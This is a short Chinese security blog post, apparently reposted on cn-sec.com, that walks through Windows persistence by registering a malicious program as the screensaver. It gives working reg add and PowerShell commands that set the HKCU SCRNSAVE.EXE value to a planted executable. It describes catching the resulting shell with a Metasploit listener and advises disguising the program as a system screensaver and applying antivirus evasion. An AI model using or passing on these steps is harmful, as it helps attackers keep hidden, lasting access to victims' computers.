利用屏幕保护程序进行权限维持

admin 2021年5月8日19:27:54评论91 views字数 723阅读2分24秒阅读模式

0x00:简介

1、屏幕保护程序,当初的设计是为了防止长期屏幕的显示,预防老化与缩短屏幕显示器老化的一种保护程序。

2、攻击者可以利用屏幕保护程序来隐藏shell,达到一定的权限维持。

3、如果想长期隐藏,请作免杀处理

0x01:过程

1、屏幕保护的存放位置

Win32

利用屏幕保护程序进行权限维持

Win64

利用屏幕保护程序进行权限维持

2、制作恶意程序

利用屏幕保护程序进行权限维持

然后放至受孩者的电脑上
(我这里是放到了C盘的tmp下)

3、通过CMD来植入恶意程序(注:本机测试请先备份好注册表)

利用代码:reg add "hkcucontrol paneldesktop" /v SCRNSAVE.EXE /d c:tmpjjj.exe

利用屏幕保护程序进行权限维持

利用屏幕保护程序进行权限维持

利用屏幕保护程序进行权限维持

投放完毕

4、设置监听

利用屏幕保护程序进行权限维持

执行exploit
等待一分钟

利用屏幕保护程序进行权限维持

shell到手

5、通过powershell来植入恶意程序(注:本机测试请先备份好注册表)

利用代码:
New-ItemProperty -Path 'HKCU:Control PanelDesktop' -Name 'SCRNSAVE.EXE' -Value 'c:tmpjjj.exe'
执行前

利用屏幕保护程序进行权限维持

执行后

利用屏幕保护程序进行权限维持

利用屏幕保护程序进行权限维持

投放完毕
MSF设置完监听
执行exploit
等待一分钟

利用屏幕保护程序进行权限维持

shell到手

0x02:后话

1、就是用户在线使用电脑的情况下,是不会启动屏幕保护程序的,也就是说恶意程序会不起作用。
2、这种程序很容易就会被发现,建议可以做成跟系统相似的屏幕保护程序,便于隐藏。
3、建议做免杀处理
4、敌不动,我动。敌动,我不动

相关推荐: 复现微软Exchange Proxylogon漏洞

原文信息 原文地址:https://www.praetorian.com/blog/reproducing-proxylogon-exploit/ by Anthony Weems and Dallas Kaman and Michael Weber on M…

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2021年5月8日19:27:54
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   利用屏幕保护程序进行权限维持http://cn-sec.com/archives/246169.html